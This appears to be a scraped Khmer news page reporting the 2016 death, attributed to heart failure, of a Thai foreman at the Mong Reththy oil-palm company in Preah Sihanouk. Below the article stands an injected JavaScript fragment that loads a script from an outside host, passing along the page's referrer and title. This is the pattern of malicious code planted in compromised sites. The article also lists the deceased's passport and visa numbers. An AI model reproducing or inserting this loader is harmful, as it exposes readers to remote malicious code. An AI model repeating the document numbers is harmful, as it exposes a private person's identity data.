ស្លាប់ជនបរទេសម្នាក់ក្នុងក្រុមហ៊ុនដំណាំដូងប្រេងម៉ុងរិទ្ធីគ្រុប

image-456

ព្រះសីហនុ ៖ ជនជាតិថៃម្នាក់ ជាមេការគ្រឿងចក្រក្នុងក្រុមហ៊ុនដំណាំដូងប្រេងម៉ុងរិទ្ធីគ្រុប ត្រូវបានគេប្រទះឃើញដេកស្លាប់ដោយមិនដឹងមូលហេតុ កាលពីវេលាម៉ោង៥និង៣០នាទីព្រឹកថ្ងៃទី២ ខែកញ្ញា ឆ្នាំ២០១៦  នៅចំណុចបន្ទប់ស្នាក់នៅរបស់ក្រុមហ៊ុនខាងលើ ស្ថិតក្នុងភូមិអន្លង់ក្រពើ ឃុំជើងគោ ស្រុកព្រៃនប់។

ជនជាតិថៃដែលដេកស្លាប់ដោយ មិនដឹងមូលហេតុនេះ ត្រូវបានស្គាល់ឈ្មោះ FAKVILAI  KOVIT ភេទប្រុស អាយុ៤១ឆ្នាំ កាន់លិខិតឆ្លងដែនលេខ T962920 មានសុពលភាពថ្ងៃទី 02.09.17 ទិដ្ឋការលេខ EI00883895 មានសុពលភាពរហូតដល់ថ្ងៃទី21.12.2016 ។

សមត្ថកិច្ចជំនាញ របស់ការិយាល័យបច្ចេកទេស វិទ្យា សាស្រ្ត និងក្រុមគ្រូពេទ្យមណ្ឌលសុខភាពឃុំជើងគោ បានកំណត់ថាសាកសពស្លាប់ដោយអាការៈគាំងបេះដូង ។ ដើម្បីរង់ចាំក្រុមគ្រួសារសព ដើម្បីចាត់ចែងតាមការស្នើសុំ សពត្រូវបានរក្សាទុកនៅកន្លែងកើតហេតុខាងលើ។

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More